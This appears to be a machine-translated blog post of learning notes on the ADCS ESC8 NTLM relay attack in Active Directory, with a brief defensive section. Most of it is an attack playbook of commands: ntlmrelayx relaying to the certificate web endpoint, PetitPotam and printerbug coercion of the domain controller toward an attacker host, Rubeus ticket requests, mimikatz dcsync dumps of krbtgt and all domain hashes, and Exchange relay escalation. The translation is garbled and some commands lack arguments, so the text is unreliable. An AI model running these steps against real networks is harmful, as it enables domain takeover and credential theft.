[old text migration] ADCS ESC8 learning notes


ADCS ESC8, also known as ADCS Relay, is the most widely used hole in ADCS

adcs  esc1-esc8 relevant: https://mp.weixin.qq.com/s/CG-kSHyWDnUERL4NGddiRw
Exploit reason:
because ADCS of http The certificate interface is not enabled NTLM Relay protection, so it is vulnerable to NTLM Relay Attack. and Authorization HTTP The header explicitly allows only passing NTLM Authentication, so Kerberos The protocol cannot be used. Therefore, attackers can take advantage of NTLM Relay attack ADCS Certificate services.

1.adopt ntlm_relay,We got a machine A User authentication certificate
2.We pass Rubeus asktgt The function uses this certificate to AD launch kerberos authentication
3.We got TGT And request the name of the target machine TGS,Get permission

1, Add ADCS service

Add ADCS service

Select certification authority

Click Install directly

2, Configure ADCS service

Select Enterprise CA

Right click Copy template

Change the name to LDAPS

Right click Properties -- > request processing -- > export private key

Create a new template to issue

Apply for a new certificate

3, ADCS-ESC8 attack


(1) Find a certificate server by certificate

certutil -config - -ping
certutil  -ca

(2) ntlmrelayx listening

A new version of impacket is required( https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack)

sudo python3 ntlmrelayx.py -t -smb2support --adcs 

(3) Trigger back connection

Use the script to trigger the auxiliary domain control to connect back to our attack machine. Here, you can use the latest Petitpotam.py or printerbug.py


python3 PetitPotam.py    kali ip   dc ip  
python3 PetitPotam.py  

2. Printerbug (user account in the domain is required)

python3 printerbug.py mark/hacker@dcip  kaliip
python3 printerbug.py mark/hacker@   

(4)ntlmrelayx successfully performed the relay and obtained the certificate information

(5) Get domain management

With this certificate, you can directly use kekeo or rubeus to apply for tgt, so that you can dcsync

base64 /input:on
tgt::ask /pfx:xxx /user:DC01$  /ptt

Rubeus.exe asktgt /user:DC01$ /certificate:xxx  /ptt

Using mimikatz, you can export any user hash in the domain

#Viewing kerberos tickets

#Export krbtgt user's hash
lsadump::dcsync /user:krbtgt /csv

#Export intra domain hash
lsadump::dcsync /all /csv /domain:mark.com

Pit stepping point:

(1) rubeus reported error 1

Solution: use Rubeus version 1.6.4

(2) rubeus error 2



Open group policy, computer configuration \ Windows settings \ security settings \ local policy \ security options, find and configure the encryption types allowed by Kerberos, and check all the following

After checking, restart to obtain TGT

Detection and defense

  1. If not, you can turn off the web endpoint of certificate services.
  2. You can delete the ntlm authentication in the iis configuration of the certsrv, the web endpoint we are relaying to, so that ntlm cannot be used for authentication and the relay attack is blocked.

4, About NTLM request [excerpt from evi1cg article]

(1) Passive trigger

The normal way is to construct a UNC path for our target to access, such as:

dir \\hostshare\xx

Or send an email with an image and a unc path, such as:

<img src="\\hostshare\xx">

Passive triggering is generally passive, and active triggering is generally used

(2) Active trigger

Most active triggers require that we have the account and password of members in the domain.


Exchange is a high-value target. By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain in which exchange is installed, which means that we can enhance the permission. It is also possible to directly take domain control by using exchange.


This vulnerability is essentially an SSRF vulnerability. The main cause of the vulnerability is that when accessing the user's' subscription 'in the underlying logic of exchange, the net NTLM hash of the system user will be used to access the target address. Therefore, a malicious server can be constructed to grab the net NTLM hash of the exchange server's system account, replay it and relay it to the administrator's permission.

utilize Relay To get the specified user directly Hash
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
domain.com -th DCip MailServerip


Use exchange vulnerability and printer bug vulnerability to relay and connect back

https://www.cnblogs.com/mrhonest/p/14187849.html# Vulnerability overview

1.The attacker turns on the relay
impacket-ntlmrelayx --escalate-user chenli -t ldap:// -smb2support --remove-mic --delegate-access -debug

2.Use printer vulnerability
spoolsample.exe	exchangeIP Attack aircraft IP
python3 printerbug.py sync.net/chenli:cl123\!\@\#45@
RPC utilization

1. Printer bug vulnerability

Microsoft officially considers it a normal business and does not provide a patch. Microsoft's spoolsv.exe registers a service and several RPCs. It allows authenticated users to call remotely. The function RemoteFindFirstPrinterChangeNotificationEx passes a unc path, and the printer service will request the unc path. Since the printer runs with system permission, we can access it The printer rpc forces the printer service to send a request to us, and the net NTLM hash obtained is the machine user hash.

python printerbug.py cgdomain.com/test:'1qaz@WSX'@


PetitPotam is a new rpc utilization method just released in July this year. After the patch was updated, many printing services were shut down. Some attackers have developed an rpc attack method through efs

Encrypted file system(EFS)It's Microsoft Windows stay NTFS3.0 A feature introduced in, which provides file system level encryption. This technology enables files to support transparent encryption to protect confidential data from attackers with physical access. EFS from Windows 2000 Start in all areas developed for the business environment Windows Available in version.

The vulnerability exploits the Microsoft encrypted file system remote protocol( MS-EFSRPC,MicroSoft Encrypting File System Remote Protocol). MS-EFSRPC yes Microsoft The encrypted file system remote protocol is used to perform "maintenance and management operations" on encrypted data stored remotely and accessed through the network. Using this vulnerability, hackers can connect to LSARPC Force trigger target machine to send to specified remote server Net-NTLM Hash,So the attacker gets Net-NTLM Hash Can be carried out after NTLM Relay Attack to take over the entire domain. This vulnerability can be used to replace Printerbug. 

An attacker can use MS-EFSRPC Agreement will DC NTLM Relay credentials to Active Directory Certificate Services AD CS Web Register page to register DC Certificate to send its credentials to the domain controller

Similar to the previous printer bug, EFS's rpc allows malicious domain users and / or machine accounts to control outgoing authentication of other machines. SERVER2012 supports anonymous triggering, and server2016 above anonymous pipes are empty by default and need credentials to trigger

python Petitpotam.py -u sanfeng -p '1qaz@WSX' -d cgdomain.com

(3) Full patch case

If you install certificate services, you can use ADCS

Reference article:






Posted on Wed, 24 Nov 2021 14:27:14 -0500 by JimmyD